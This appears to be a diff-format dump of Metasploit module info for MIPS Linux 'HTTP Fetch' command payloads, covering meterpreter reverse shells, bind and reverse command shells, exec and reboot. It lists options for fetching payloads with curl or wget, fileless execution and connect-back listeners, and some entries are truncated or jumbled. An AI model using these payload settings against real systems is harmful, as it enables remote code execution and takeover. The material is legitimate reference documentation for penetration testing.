FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME OJApyhagJby no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,106 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
B
Evasion options for payload/cmd/linux/http/mipsbe/meterpreter_reverse_https:
=========================
@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME ICLFrRDOUN no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,97 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME QibeYbciB no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,69 +0,0 @@
Name: HTTP Fetch, Linux Reboot
Module: payload/cmd/linux/http/mipsbe/reboot
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Michael Messner <devnull@s3cur1ty.de>
rigan - <imrigan@gmail.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME vwzXdDryf no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
A very small shellcode for rebooting the system.
This payload is sometimes helpful for testing purposes or executing
other payloads that rely on initial startup procedures.
Name Current Setting Required Description
---- --------------- -------- -----------
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,91 +0,0 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager
Module: payload/cmd/linux/http/mipsbe/shell/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
juan vazquez <juan.vazquez@metasploit.com>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME uTHuAvxylJ no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Spawn a command shell (staged).
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,74 +0,0 @@
Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline
Module: payload/cmd/linux/http/mipsbe/shell_bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
scut
vaicebine
Vlatko Kosturjak
juan vazquez <juan.vazquez@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME EtbkdTGdbo no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,79 +0,0 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
Module: payload/cmd/linux/http/mipsbe/shell_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 114
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
rigan <imrigan@gmail.com>
juan vazquez <juan.vazquez@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME LTdmakIVHUuT no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSBE payload from an HTTP server.
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,70 +0,0 @@
Name: HTTP Fetch, Linux Execute Command
Module: payload/cmd/linux/http/mipsle/exec
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Michael Messner <devnull@s3cur1ty.de>
entropy <entropy@phiral.net>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME BHtMUdPnuAr no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
A very small shellcode for executing commands.
This module is sometimes helpful for testing purposes as well as
on targets with extremely limited buffer space.
Name Current Setting Required Description
---- --------------- -------- -----------
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,100 +0,0 @@
Name: HTTP Fetch, Reverse TCP Stager
Module: payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 108
Rank: Norm
Evasion options for payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp:
=========================
juan vazquez <juan.vazquez@metasploit.com>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME UlqevxizRg no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an MIPSLE payload from an HTTP server.
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
